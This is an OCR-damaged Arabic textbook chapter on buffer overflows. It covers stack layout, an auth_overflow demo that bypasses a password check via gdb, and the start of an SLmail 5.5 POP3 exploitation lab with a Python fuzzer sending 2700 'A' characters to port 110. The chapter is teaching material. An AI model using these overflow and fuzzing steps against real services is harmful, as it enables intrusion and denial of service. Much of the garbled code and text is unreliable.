سننتقل الآن لنتکلم عن نوع من الثغرات الشهيرة وهى ال "Buffer Overflow"‏ 


Buffer Overflow 


ال Buffer Overflow‏ من ERAT‏ الشهيرة في الاختراق» إنها تستغل نقاط الضعف لدى البرامج في تعاملها مع Jl‏ 
«memory‏ ويكون Sabl‏ من هذا النوع من الثغرات هو SI‏ في سبر البرنامج Y “the execution flow”‏ 
بتنفيذ instructions‏ أو malicious code‏ )42.2 في ol‏ ما داخل ال memory‏ 

"Execution of arbitrary code" بال‎ oles yl تطلق على هذا النوع من‎ 
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فمثلاً إذا قام أحد ا بتخصيص buffer‏ لیستقبل منا inputs‏ وكان هذا ال buffer‏ يستوعب bytes‏ 6 فقمنا 
bytes JU-»b Sad‏ 8 ذلا ^ ذلك !۰ فسوف يحدّث Overflow‏ لهذا ال buffer‏ 
E‏ هذا الإجراء بال Buffer Overrun‏ أو «Buffer Overflow‏ لأن ال bytes‏ 2 الزائدين عن الا APUL‏ 


سيتسببان في هذه الأزمة.. ال 


Microsoft Visual C++ Runtime Library 


“Overflow”‏ الحادث. 
Buffer overrun detected!‏ 


هذا مثا > حالة مه 
Program: ...am Files\Microsoft Office\OFFICE1 1\WINWORD.EXE o^ C^ J‏ 


4 buffer overrun has been detected which has corrupted the program's تم اكتشافها‎ .BOF حالات ال‎ 
internal state. The program cannot safely continue execution and must 


now be terminated. deii deals. فعا‎ Je 
: : Word في برنامج ال‎ SLY 


“Buffer Overrun Detected error after you installs Office 2003 Service Pack 3 for Hebrew” 
The Hebrew version of Microsoft Office Word 2003 Service Pack 3 may stop responding when 
you run a spelling and grammar check or when you use a custom dictionary that was created 
before Service Pack 3. 

You may receive the following error message: 


Microsoft Visual C ++ Runtime library 

buffer overrun detected! Program: C:\Program Files\Microsoft OfficeNOffice1 INWinword.exe, A 
buffer overrun has been detected which has corrupted the program's internal state. The program 
cannot safely continue execution and must now be terminated. 


سنأخذ مثال بسيط لنفهم كيف DIÉ‏ هذه الثغرة. 
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تأمل مَعى هذا الكود: 


#include <stdio.h> 
#include <string.h> 


int main(int argc, char *argv[]) { 
int value = 5; 
char buffer one[8], buffer two[8]; 


stropy(burter one, "one"); /* Put "one" into buffer one. */ 
stropy(buffer two, "two"); /* Put "two" into buffer two. */ 
printf("[BEFORE] buffer two is at $p and contains \'%s\'\n", 
buffer two, buffer two); 
printf (" [BEFORE] buffer one is at م5‎ and ‘contains X'$sVX'An", 
buffer one, buffer one); 
[ 


printf("[BEFORE] value is at $p and is $d (0x%08x)\n", &value, 
value, value); 


printf("Nn[STRCPY] copying 50 bytes into buffer two\n\n", 
strlen(argv[1])); 


strcpy(buffer two, argv[1]); /* Copy first argument into 
buffer two. */ 


LH 


printf ("[AFT! 
buffe 
printf ("[AFT! 


R] buffer two is at $p and contains \'%s\'\n", 

two, buffer two); 

R] buffer one is at «p and contains \'%s\'\n", 

buffer one, buffer one); 

printf("[AFTER] value is at $p and is $d (0x%08x)\n", &value, 
value, value); 


H 


LH 


H 


LH 


في هذا الكود: 


buffer two لنقوم بوضعه في ال‎ argv[1] وهو ال‎ ed di من‎ input بصدد استقبال‎ as 
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سنقوم بإداخل Input‏ عشوائية. . bytes Jane, “1234567890” See‏ ۰10 لاحظ char array lÎ‏ أي نها ستتعامل 


مع الرقم وكأنه char‏ فسيشغل byte‏ 1 فقط. 
هيا لنشاهد النتائج: 


reader@hacking:~/booksre $ gcc -o overflow example overflow example.c 
reader@hacking:~/booksre $ ./overflow example 1234567890 


[BEFORE] buffer two is at Oxbffff7f0 and contains 'two' 
[BEFORE] buffer one is at Oxbffff7f8 and contains 'one' 
[BEFORE] value is at Oxbffff804 and is 5 (0x00000005) 

[STRCPY] copying 10 bytes into buffer two 

[AFTER] buffer two is at Oxbffff7f0 and contains '1234567890' 
[AFTER] buffer one is at Oxbffff7f8 and contains '90' 

[AFTER] value is at Oxbffff804 and is 5 (0x00000005) 


reader@hacking:~/booksrce $ 


ثلاحظ في السطر ال bold‏ أنه تم حدوث Overflow‏ بالفعل» بسبب Use‏ وضع bytes‏ 10 داخل مُتغير yaad‏ 
ليستوعب bytes‏ 8 فقط. 

وبالتالي قامت هذه ال bytes‏ 2 الزائدة بعمل buffer one pań overflow‏ کا 34b‏ لنا.. وهذا OY‏ ال buffer‏ 
الزائدة عن المألوف $ تسیب owl overflow‏ الأخرى القريبة منها داخل ال memory‏ 


EN‏ إدخال input‏ كبيرة ذ Loud‏ و شاه ما يحدّث: 


reader@hacking:~/booksrc $ ./overflow example 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


[BEFORE] buffer two is at Oxbffff7e0 and contains 'two' 
[BEFORE] buffer one is at Oxbffff7e8 and contains 'one' 
[BEFORE] value is at Oxbffff7f4 and is 5 (0x00000005) 
[STRCPY] copying 29 bytes into buffer two 

[AFTER] buffer two is at Oxbffff7e0 and contains 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ۲ 
[AFTER] buffer one is at Oxbffff7e8 and contains 
k AAAAAAAAAAAAAAAAAAAAA 7 


EM 
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[AFTER] value is at Oxbffff7f4 and is 1094795585 (0x41414141) 
Segmentation fault (core dumped) 
reader@hacking:~/booksrce $ 


لاحظ أن المتغير "5 Let “int value‏ حدث له overflow‏ هذه المرة!. 


سنزيد ال Buffer‏ أكثر لنختبر هذا الكود: 


reader@hacking:~/booksre $ ./notesearch 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

SoS SSS [ end of note data ]------- 

Segmentation fault 

reader8ühacking:-/booksrc $ 


^ 


ثلاحظ أنه قد تَسببَ في خدوث crash‏ للبرنامج. 
The Stack‏ 


قبل أن Aas‏ 
IK‏ ببعض المعلومات التى ناقشناها du.‏ مايل بعض الأسطر من “the shellcoder’s handbook" GUS‏ 


"When a program is executed, it is laid out in an organized manner—various elements of the 
program are mapped into memory. First, the operating system creates an address space in which 
the program will run. This address space includes the actual program instructions as well as any 
required data. Next, information is loaded from the program’s executable file to the newly 
created address space. There are three types of segments: .text, .bss, and .data. The .text segment 
is mapped as read-only, whereas .data and .bss are writable. The .bss and .data segments are 
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reserved for global variables. The .data segment contains static initialized data, and the .bss 
segment contains uninitialized data. The final segment, .text, holds the program instructions. 
Finally, the stack and the heap are initialized". 


^ Lower addresses (0x08000000) 
Shared libraries 

.text 

.bss 

Heap (grows |) 

Stack (grows 1) 

env pointer 

Argc 

| Higher addresses (Oxbfffffff) 


€. Stack نتعامل مع ال‎ US هل تتذكر متى‎ 
Function Call تعاملنا معها عندما احتجنا إجراء‎ 
هذه!.‎ Function Call و عملية ال‎ Stack خفيفة داخل ال‎ is سل‎ 
Let's think about what happens in a function call: 
=" When a function call is executed, the arguments need to be evaluated to values. 


= Then, control flow jumps to the body of the function, and code begins executing there. 


" Once a return statement has been encountered, we're done with the function, and return back to 
the function call. 


“Stack Frame" تُطلق عليه‎ function ال‎ «4 jake جزء‎ Stack في ال‎ 055% “function call" عَمَلية‎ JS 
يبدو في‎ |S حينها على هذه الهيئة»‎ Stack تکون ال‎ ES anain( ( لنتخيل معا أننا داخل برنامج صغير يبدأ بال‎ 
:)1( الصفحة التالية» في الشكل رقم‎ 
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كما ترى يظهر ال stack frame‏ الخاص «main( ) JL‏ 5 435 ال 
Stack Pointer (SP)‏ إلى بداية ال „b .Function‏ هذا ال 
Frame‏ عندما تبداً ال ) main(‏ عملها. لنتخيل وجو function»‏ 
أخرى يحدث للا call‏ من داخل ال ) «main(‏ اسمها ) foo(‏ 
هذه ال ) foo(‏ تأخذ «Two Arguments Se.‏ هذه ال 


. : حب SP‏ 
185 سَتكون بحاجة 3 ضعهم في ال main )( Stack‏ 


main stack 
frame ستقوم ( )100 هذه بإجراء عملية حسابية وإرجاع النانج وهو ال‎ 
اعتدنا من قبل.‎ |S main( ) إلى ال‎ return value 

Figure 1 

يكون شكل ال |S stack‏ يظهر في الشكل رقم )2(: 
Push ee e‏ لل Arguments‏ الخاصة بال ) )100 إلى ال ‘Stack‏ ثم انتقل ال Stack Pointer‏ لیشبر إلى C‏ 
ال Return value‏ .. هذا ال Return value‏ سیتم حسابه 
بواسطة ) .foo(‏ وبالتالي سيتم ملیع هذه ال space‏ بعد أن 
تنتهي ( )100 من عملها. بعد وضع ال «Arguments‏ ربا 


تمتلك هذه ال 0 عدد من ال ..local variables‏ 


main() كي‎ Stack لمساحةٍ ما على ال‎ push Jes) 100) ) clare 


stack 5 
mäin frame وإجراء‎ "Local Variables" تستخدمها لوضع هذه ال‎ 
Figure 2 ` عملياتها‎ 
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الشكل التالي» رقم )3( يوضح ما ستبدو عليه ال Stack‏ بعد هذه التعدیلات: 


Figure 3 


foo( ) داخل ال‎ Stack Pointer وانتقل ال‎ foo( ) الخاص بال‎ Frame تكوين ال‎ e a 


BU‏ ينتقل ال SP‏ إليها؟ 
لأن عملية ال allocation‏ للمساحة الخاصة ب ()100 ستتم بعمل decrement‏ لل ESP‏ وبالتالي ينتقل ال odd SP‏ 
ااا 


ولكن ما هذا ال FP‏ الذي ظهرلنا؟ ..إنه ال "Frame Pointer"‏ 
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هذا الشیء 2 يشير إلى ال Address‏ الذي as ols‏ عليه ال Stack Pointer‏ قبل أن تقوع ) foot‏ بتحريكه ال حيث Jie‏ 


Local Variables‏ الخاصة ما. 


Points to the location where the stack pointer was, just before foo( ) moved the stack pointer 
for foo( )'s own local variables. 


ولاذا يشير إلى ذلك الموضع؟ 


كى يتمكن ال Stack Pointer‏ بالعودة إليه مرة أخرى بعد أن تنتهى ) )100 من عملها. 


کیف یعود إذا؟ 


reduce ویسبب ذلك حدوث‎ FP إلى ال‎ SP فینتقل ال‎ move [$EBP, 


لل stack‏ کا هو موضح في الشکل رقم )4( 


oo 


] أشبه هذه:‎ instruction Lax 


E‏ لكا 
y main ()‏ | 


stack 
frame 


Figure 4 
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سأوضح لك عملية ال function call‏ بمثال عملي.. 
مايل el al‏ بالترتیب؛ 


]. Push the parameters in the reverse order (right to left). 


2. "Call" function now. It implicitly pushes the return address into STACK. 
LE call func ]] 


(return value وال‎ return address ال‎ Gy (انتبه!.. لا تخلط‎ 


3. Push the current EBP ie. Frame Pointer (FP) of calling function into stack. We need to do 
this to continue with the execution of calling function after return from the called 
function. [[ pushl $ebp ]] 

4. Copy the ESP to EBP. (yes, this location will be new FRAME POINTER) 

[[ movl $esp, $ebp ]] 
5. Allocate space on stack for local variables. It's done by decrementing ESP. 
] ] subl $4, $esp ]] 


7. Copy current EBP to ESP, it will reduce stack's size. Now we have old FP at the top of 
the stack. 

| movil $ebp, $esp]] 

8. Pop a 32 bit value (which is old frame pointer) and stuff it into EBP. (undoing Step 3) 

[[ popl $ebp ]] 

9. The "ret" instruction pops a 32 bit value from the stack and stuffs into the program 

counter. 

[[ ret ]] 


** Steps 7 and 8 are combined in single instruction "leave". 
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والآن لنشاهد هذه الخطوات بال Assembly code‏ : 


ل 
pushl $ebp‏ 
movil $esp, 0‏ 
subl $4, %esp‏ 
movil $8, -4(%ebp)‏ 
movl -4($ebp), $eax‏ 
addi 8($ebp), $eax‏ 

leave 

ret 

main 
pushl a 
call fm es 
addl $16, %esp 
mov lL $eax, -4($ebp) 
movl -4($ebp), $eax 
movl $eax, C 


tep 
tep 
tep 


tep 
tep 
tep 


SCENES 
Sei eSI) 
SS SEE 


S 
S 
S 
> oae الام‎ ZO 
S 
S 
S 


3, Push EBP 

4, Copy ESP -» EBP 

5, Create space on 
E EOD O 

6۱ CODY UE EO BAS 

oy, AIM UE EO EAN 

cado 

RSE (EBE تج‎ 

EBP (Pop STACK -> 

9, (Pop STACK -> P 


1, 
2, 


push parameters 
caseus 


Stack EOE کار‎ 


EBP) 


rogram Counter) 


Stack Overflow 


باعل مثال لنوضح 4 ال .Stack Overflow‏ 


ما يل كود عبارة عن ex Function‏ استدعاها من ال ) main(‏ لتقوم fox‏ ال user authentication‏ عن طریق 


كتابتك o MALIS)‏ لتقوم هي ur Us‏ بقيمة ماء نم عرض النتائج. 
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#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 


int check authentication(char *password) { 
int auth flag - 0; 
char password buffer[16]; 


strcpy(password buffer, password); 


if (strcmp (password buffer, "brillig") == 0) 
auth flag = 1; 

if (strcmp (password buffer, "outgrabe") == 0) 
auth flag = 1; 


return auth flag; 


) 


int main(int argc, char *argv[]) 1 
if(arge < 2) 1 
printf("Usage: $s <password>\n", argv[0]); 


exit(0); 
} 
if (check authentication(argv[1])) 1 
printf ("^n Xn!) sz 
printf(" Access Granted. n"); 
printf(" Xn") s 
) else 1 
printf ("\nAccess Denied.\n") ; 


} 


aal وهي كلمة‎ User من ال‎ argv[1] ستقوم باستقبال‎ check authentication( ) في المثال‎ gle 
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لتقوم بوضعها في ال password, buffer‏ $< مُقارنتها بالقيمة “brilling”‏ أو “outgrabe”‏ لیتم طباعة عبارة “Access‏ 


. Granted" 


..هيا لنجرب هذا الكود: 


reader@hacking:~/booksre $ gcc -g -o auth overflow auth overflow.c 
reader@hacking:~/booksre $ ./auth overflow 

Usage: ./auth overflow «password» 
reader@hacking:~/booksre $ ./auth overflow test 
Access Denied. 
reader@hacking:~/booksre $ ./auth overflow brillig 


Access Granted. 


reader@hacking:~/booksre $ ./auth overflow outgrabe 


Access Granted. 


reader@hacking:~/booksrce $ 


کا تلاحظ عند إدخالنا àx)S‏ مُرور LI c» 24b test‏ رسالة !Access Denied‏ 
ولكن عند ماولة إدخال input‏ آکبر Gs‏ اللازم سَنلاحظ حُدوث ا لل في سير البرنامج يما يَتسبّب في J pal‏ على ال 
9 بدون الحاجة LES‏ كَلِمّة المرور!. 


reader@hacking:~/booksre $ ./auth overflow 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


Access Granted. 


reader@hacking:~/booksrce $ 


لقد ÉSE‏ من الدخول بدون ال Password‏ 


Security & Attachs 
[255] 


تعال نشاهد ما حدث بشكل تفصیلي.. سَنقوم بتشغيل البرنامج باستخدام ال Debugger‏ ونقوم بوضع 
Breakpoint‏ عند عملية e‏ ال «buffer‏ وآخر عند ال return value‏ الخاص .check_authenticaion( ) JL‏ 


reader@hacking:~/booksre $ gdb -q ./auth overflow 
Using host libthread db library 
"/lib/tls/ieS6/cmov/libthread db.so.1". 

(gdb) list 
1 #include <stdio.h> 
2 #include <stdlib.h> 
3 #include <string.h> 


4 

5 int check authentication(char *password) { 

6 int auth flag = 0; 

7 char password buffer [16]; 

8 

9 strcpy(password buffer, password); 

10 

(gdb) 

1] if (strcmp (password buffer, "brillig") == 0) 
12 auth_flag = 1; 

13 if (strcmp (password buffer, "outgrabe") == 0) 
14 auth flag = 1; 

15 

16 return auth flag; 

17 } 

18 

19 int main(int argc, char *argv[]) { 

20 if(arge < 2) { 

(gdb) break 9 

Breakpoint 1 at 0x8048421: file auth_overflow.c, line 9. 


(gdb) break 16 
Breakpoint 2 at 0x804846f: file auth_overflow.c, line 16. 
(gdb) 


H 


(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Starting program: /home/reader/booksrc/auth_overflow 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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Breakpoint 1, check authentication (password-Oxbffff9af 'A' «repeats 
30 times») at 
auth overflow.c:9 


9 strcpy(password buffer, password); 
(gdb) x/s password buffer 
Oxbffff7a0: ")????0??????)N205N004Nb?20? ?p?? 2 2 2?" 


(gdb) x/x &auth flag 

Oxbffff7bc: 0x00000000 

(gdb) print Oxbffff7bc - Oxbffff7a0 
$1 = 28 
(gdb) x/16xw password buffer 
Oxbffff7a0: 057595729 0607 ۶06۴۴4 Oxbffff7d8 0x08048529 
Oxbffff7b0: Oxb7fd6ff4 Oxbffff870 Oxbffff7d8 0x00000000 
Oxbffff7c0O: 0207۴۶۴47100 0x08048510 Oxbffff7d8 0x080484bb 
Oxbffff7d0: Oxbffff9af 0x08048510 Oxbffff838 Oxb7eafebc 
(gdb) 


(gdb) continue 

Continuing. 

Breakpoint 2, check authentication (password-Oxbffff9af 'A' «repeats 
30 times») at 

auth overflow.c:16 
16 return auth flag; 

(gdb) x/s password buffer 
Oxbffff7a0: 'A' «repeats 30 times» 
(gdb) x/x &auth flag 
Oxbffff7bc: 0x0000414] 
(gdb) x/16xw password buffer 

Oxbffff7a0: 0x41414141 0x41414141 0x41414141 0x4141 
Oxbffff7b0: 0x41414141 0x41414141 0x41414141 0x00004141 س‎ 
Oxbffff7c0: Oxb7ff47b0 0x08048510 Oxbffff7d8 0x080484bb 
Oxbffff7d0: Oxbffff9af 0x08048510 Oxbffff838 Oxb7eafebc 
(gdb) x/4cb &auth flag 

Oxbffff7bc: 65 'A' 65 'A' 0 'NO' 0 '\O! 
(gdb) x/dw &auth flag 

Oxbffff7bc: 16705 

(gdb) 
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(gdb) continue 
Continuing. 


Access Granted. 


Program exited with code 034. 
(gdb) 


gles‏ بالنتائج Ul‏ قمنا بتحديد breakpoint‏ الأولى عند هذا السطر: 


9 strcpy(password buffer, password); 


حیث يتوقف البرنامج حينها ويُظهر LÍ‏ ال gdb‏ حالة ال Memory‏ 
سئلاحظ أن ال password. buffer‏ پتواجد 3( هذا ال Oxbffff7a0 :address‏ 
3ls‏ ال ex "Auth. flag variable"‏ في هذا ال Oxbffff7bc :address‏ وممل القيمة )0(: 0x00000000‏ 


قمنا بحساب عَدد ال bytes‏ التی G3‏ ال to) Auth. flag‏ أنها byets‏ ۰28 كما يل: 


(gdb) x/16xw password buffer 
Oxbffff7a0: 0xb7f9f729 Oxb7fd6ff4 Oxbffff7d8 0x08048529 
Oxbffff7b0: Oxb7fd6ff4 Oxbffff870 Oxbffff7d8 


(4 bytes * 7 = 28 bytes) فیّمکننا أن نقول:‎ 4 bytes کل 5 منهم عبارة عن‎ ol le 


ثم يبدأ بعدها ال "Location of auth. flag"‏ وهو ال: 0x00000000‏ 


هيا لنكمل AS‏ البرنامج ze I‏ ال Breakpoint‏ الثانية» وهی See‏ السطر 16. 


(gdb) x/x &auth flag 
Oxbffff7bc: 0x0000 1 
(gdb) x/16xw password buffer 

Oxbffff7a0: Ox 1 1 Ox 14141 0x41 1 0x4141 
Oxbffff7b0: 0x414] T; OX 14141 0x41414] 0x000041 


إنه يُظهر ol tj‏ ال auth, flag‏ قد 25 2 | ل overflow‏ جزئی» فقد ~ استبدال آول bytes‏ 2 منت AA‏ 
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EI 
يظهر في الصفحة التالية:‎ CS 16705 وبالتالي تغيرت قيمته من صفر إلى قيمة أخرى هی‎ 
(gdb) x/dw &auth flag 
Oxbffff7bc: 16705 


نحن US‏ قد استخدمنا دالة Sa if‏ أي قيمة غير الصفر قيمة مقبولة!: 
ونحن J‏ ر اي ص عير عم معيو 


if (strcmp (password buffer, "brillig") == 0) 
auth flag = 1; 

if (strcmp (password buffer, "outgrabe") == 0) 
auth flag = 1; 


return auth flag; 
Authentication قيمة غير الصفره ما يؤدي لنجاح عملي ال‎ auth, flag p dene وبالتالي‎ 
هذا الىر نامج » الذي لو قمنا‎ “execution control point" هو ال‎ auth_flag variable نستنتج من هذا أن ال‎ 


بالتلاعب به خی المدف!. 


والآن كيف UJ‏ تفادي هذه الثغرة..؟ 

buffer وهي كلمة المرور» هذا ال‎ input É الذي سيستقبل‎ buffer لل‎ overflow في المثال السابق نقوم بعمل‎ s 
.password, buffer[16] هو:‎ 

حيث تم تخصيص 16 حرف لذلك. ar‏ قمنا نحن بإدخال الحرف A‏ مُكَرّر 30 مرة!ء وبا أن ال auth. flag‏ يقع 


مکانه بعد ال password buffer‏ مباشرة à‏ ال memory‏ فقد طالة الخطر SY‏ 
Ja‏ إجراء بيط لتفادي حدوث هذا اخلل: 
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سنقوم بتبديل الأماكن.. Ya‏ من تواجد ال auth. flag‏ بعد ال buffer‏ 3( ال memory‏ سنقوم بوضعه قبل ال 


overflow لل‎ ble وبالتالي سنضمن عدم‎ buffer 


#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 

int check authentication(char *password) { 
char password buffer[16]; 
int auth flag = 0; 


strcpy(password buffer, password); 


if (strcmp (password buffer, "brillig") == 0) 
auth flag = 1; 
if (strcmp (password buffer, "outgrabe") == 0) 
auth flag = 1; 
return auth flag; 
} 
int main(int argc, char *argv[]) { 


if(arge < 2) { 
printf ("Usage: $s <password>\n", argv[0]); 


exit (0); 
} 
if(check authentication(argv[1])) { 
printf ("^n \n"); 
printf (" Access Granted. n"); 
printf(" Vn"); 
} else 1 
printf ("\nAccess Denied. n"); 


) 
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هيا لنتأكد من فاعلية هذا الإجراء!: 


reader@hacking:~/booksre $ gcc -g auth overflow2.c 
reader@hacking:~/booksre $ gdb -q ./a.out 

Using host libthread db library 
"/1ib/tls/i686/cmov/libthread | db.so.1". 

(gdb) list 
1 #include <stdio.h> 
2 #include <stdlib.h> 
3 #include <string.h> 


4 
5 int check authentication(char *password) { 
6 char password buffer [16]; 
7 int auth flag - 0; 
8 
9 strcpy(password buffer, password); 
10 
(gdb) 
1] if (strcmp (password buffer, "brillig") == 0) 
12 auth_flag = 1; 
3 if (strcmp (password buffer, "outgrabe") == 0) 
14 auth_flag = 1; 
15 
16 return auth_flag; 
17 } 
18 
19 int main(int argc, char *argv[]) { 
20 if(arge < 2) { 
(gdb) break 9 
Breakpoint 1 at 0x8048421: file auth_overflow2.c, line 9. 
(gdb) break 16 


£4 


Ju. 


Breakpoint 2 at 0x804846f: file auth over 
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Starting program: /home/reader/booksrc/a.out 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

Breakpoint 1, check authentication (password-Oxbffff9b7 'A' «repeats 
30 times») at 

auth overflow2.c:9 


ow2.c, line 16. 
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9 strcpy(password buffer, password); 
(gdb) x/s password buffer 
Oxbffff7cO: 


(gdb) x/x &auth flag 

Oxbffff7bc: 0x00000000 

(gdb) x/16xw &auth fla 

Oxbffff7bc: 0200000000503107 ۴06۴8۴4 Oxbffff880 Oxbffff7e8 
Oxbffff7cc: Oxb7fd6ff4 02607 ۶۶47100 0x08048510 Oxbffff7e8 


Oxbffff7dc: 0x080484bb Oxbffff9b7 0x08048510 Oxbffff848 
Oxbffff7ec: Oxb7eafebc 0x00000002 Oxbffff874 Oxbffff880 


(gdb) 
(gdb) cont 
Continuing. 


Breakpoint 2, check authentication (password-Oxbffff9b7 'A' «repeats 
30 times») 

at auth overflow2.c:16 

16 return auth flag; 

(gdb) x/s password buffer 

Oxbffff7cO0: 'A' «repeats 30 times» 

(gdb) x/x &auth flag 

Oxbfftf7be: cue 


(gdb) x/16xw &auth fla 

Oxbffff7bc: 0x00000000 0x41414141 0x41414141 1 
Oxbffff7cc: 0x41414141 0x41414141 0x41414141 1 
Oxbffff7dc: 0x08004141 Oxbffff9b7 0x08048510 Oxbffff848 


Oxbffff7ec: Le اا‎ Oxbffff874 Oxbffff880 
(gdb) 

(gdb) c 

Continuing. 

Program received signal SIGSEGV, Segmentation fault. 
0x08004141 in ?? () 


والآن مارأيك؟ 


.auth flag (J overflow يحدّث‎ i 
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بدلاً من ذلك حدث ال overflow‏ 21 5 | لهذا ال 0x08004141 :address‏ 
com‏ هدفنا J path‏ على ال «Access‏ ..ولكن هذا i‏ يمنع حدوث ال Crash‏ هذا يُقودنا إلى ملاحظة الفرق 


بين المفهومين التاليين!» بين ال Exploitability‏ و ال ..Crashing‏ 


Crashing on Application 
“Is the form of Denial of Service against the application” 


وما هذا ال DoS Attack‏ ؟ 
إنه هجوم يتلخص في محاولة حجب أو تعليق PEAN (Suspend)‏ من Server‏ ما أو أي Resource‏ يتعامل 


معه ال Users‏ عن طريق إجهادو بكميات غير .13852 ys‏ ال inputs‏ التي لا يتمكن من مُعابشتها أو PLII‏ مَعَها!. 


Exploitability 
“Injecting and executing my own code within the vulnerable process” 


نستطيع أن نلخص الأمر في هذه العبارة: 
“The Exploitability is the determination whether a crash can be tuned into an Exploit!”‏ 
نقوم باختبار هذا الأمر عن طريق ال Debugging‏ وعمل ال initial analysis‏ 
ol Ss‏ نستطيع الإجابة على "لاذا۳؟ و ا 
db "‏ لاذا حدث هذا ال «crash‏ ماخلل الحادث في البرنامج» والذي سبب هذا ال .ferash‏ 
* والثانية.. أين حدث هذا ال ferash‏ ..في أي موضع من البرنامج أو في أي سطر برجي حدث هذا الخلل؟ 
هذه ال analysis‏ تقوم مها عن طريق مُراقبَة ال Registers‏ 
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فمثلاً معرفة ما إذا كان ال EIP‏ يُشِير إلى ال Stack‏ أو ال Heap‏ عند حدوث ال cerash‏ یفیذنا في تحديد المكان أو ال 
Block‏ الذي سنقوم بعمل inject‏ لل code‏ أو ال cla exploit‏ القيام بتوجيه ال Stack Pointer‏ إلى هذا المكان 
داخل ال memory‏ (الذي مکنا من وضع ال Shellcode‏ به). 


„Exception البرنامج عندما 1« ال‎ J capture jor یقوم‎ 4X هنا‎ Debugger مخدمنا ال‎ Lal 


ما هذا ال Exception‏ ..¢ 


It is a potentially uncoverable operation in a program that may cause that program to terminate 
unexpectedly. 


من الأمثلة على هذا الحدث: 
" عملية القسمة على الصفر!. 
bela, om‏ تُحاول البرنامج access ss‏ لاي location‏ داخل ال memory‏ ليست nnn i2‏ التي لا 
Suus‏ صلاحیات الذخول إليهاء (Say‏ نعلم آن ال Operating System‏ يقوم بعمل 


.protection mechanisms کنوع من ال‎ "process isolation" 
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Putting things all together 


OVI‏ وبعد أن استوعبت العديد من الأمور الشيقة» سنقوم بممارسة عملية لتدعيم كل ما تم شرحة من قبل. 


ماذا سنحتاج لبيئة الإختبار؟ 

1- سنستخدم برنامج ال 12 VMware workstation‏ يمكنك تحميلة من الوقع انخاص Mx‏ 

Kali Linux à. -2‏ أيضاً یمکنك تحمیلها بشکل GE‏ من الوقع الخاص the‏ كا يُمكنك تحمیلها کنسخة من 
نوع VMware Image‏ . 

Windows 7 ..أيضاً ينجح الإختراق مع‎ iso بامتداد‎ Win XP Bei -3 

4- نُسخة برنامج 5.5 SLmail‏ 
وما هذا ال $SLmail‏ 
Mail Server 4j‏ يدعم ال POP3‏ وال SMTP‏ ويعمل على أنظمة ويندوز. 


5- برنامج Immunity Debugger‏ لنقوم بتنصيبه على نسخة ال XP‏ 


قبل أن نبداً.. 
سنتكلم باختصار عن أشهر تقنيتين ale‏ تستخدمهی| أنظمة التشغیل هما -ASLR & DEP‏ 


WY‏ سنتعرض هم أثناء إجراء اختبار الإختراق.. 
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Data Execution Prevention (DEP): 

is a set of hardware, and software, technologies that perform additional checks on memory, to 
help prevent malicious code from running on a system. The primary benefit of DEP 15 to help 
prevent code execution by raising an exception, when execution occurs. 

Address Space Layout Randomization (ASLR): 


ASLR randomizes the base addresses of loaded applications, and DLLs, every 
time the Operating System is booted. 


هيا لنبدأ رحلتنا.. 
في الصفحة التالية شكل fal‏ عن البيئة iia d‏ في الإختبار. 


قمنا فيه بتنصيب ال SLmail‏ وال Debugger‏ الخاص بنا على ال .Win XP‏ 


o‏ إلى الخُطوة الأولى.. 


Preparing and Sending our Buffer 
عبر المنفذ 110( وهو‎ traffic أنه يسمح بمرور ال‎ Windows الخاص بال‎ Firewall تأكد في البداية من إعدادات ال‎ 


منفذ ال ۰۳0۳3 أو يمكنك إيقاف ال Firewall‏ بشكل مؤقت إن أردت. 


Security & Attachs 
[266] 


Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماءهم‎ 


e Windows XP Professional - VMware Workstation m a x 
[sca v ۱۴ = HS SETI LLuuuiuome o — ~ |Minimize| =| 
| File Edit View VM Tabs Hep | 1ل‎ > | @ | © £5 [m] E zz c | اه‎ 

Library x 


|) Home x | 88 My Computer x | تر‎ Kal-tinux-2.0.0-vm-amdés x | (Ej Windows XP Professional x| 
Q Type here to search - ———— — 


E Æ| My Computer 
Û Kali-Linux-2.0.0-vm-ar| 
(Ey) Windows XP Professio 
^1! Shared VMs 


To direct input to this VM, move the mouse pointer inside or press Ctrl+G. 5 QO d 5) » 
وإضافة هذا الكود بداخله:‎ txt وفتح ملف‎ «Kali Linux سنقوم بتشغيل‎ 


#!/usr/bin/python 


import socket 

SN Mock ose (SO Cie eae ۱ MES Clem SOCE SHISEIBEATVI) 

puffer e VAY v 2) 

EES 
prine “Y\Seiachine evil مها‎ s" 
S.cConmece (192. 168-18 LIL , 110) Y 
data = s.recv(1024) 
5. 2۵1۳0 ) USER username" + '\r\n") 
data = s.recv(1024) 
Escena INSSU d omues sb Uem) 
print "Donal," 

excep: 
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Deine COU MOE ات وت‎ 6 


هذا الکود مکتوب بلغة ال Python‏ هو باختصار یقوم بالاتصال بالمنفذ 110 وهو المنفذ الخاص ببروتوكول ۳0۳3 
في حاولة لعمل Remote Access‏ إلى ال «Mail box‏ وذلك بعمل هجوم BOF‏ بارسال حرف ال A‏ مُكرراً 2700 
مرة ی ال Buffer‏ الخصص MUS‏ 

قم بحفظ اللف وافتح ال Terminal‏ لديك. تم اذهب إلى الویندوز وقم Jata‏ ال Debugger‏ واختر File‏ تم 
Attach‏ ثم Slmail‏ سئلاحظ وجود منفذ ال ۳0۳3 وهو 110 تحت خانة ال Listening‏ ثم اضغط على Run‏ قم 


بالقفز إلى ال Terminal‏ لتنفيذ الكود بكتابة الأمر ./fuzz2.py‏ حيث 111222 هو اسم اللف: 


NENE = @ Workstationy | ۱۱ ~ | co | £ C ۳2۰ FÎ | ® Kali-Linux-2.0.0-vm-amd64 X | Ê" Windows XP Professional n tta 8 Or 


< > | firHome a| [SER ۱2| - 2 


= 5 m ù um b ۵ ۵ 
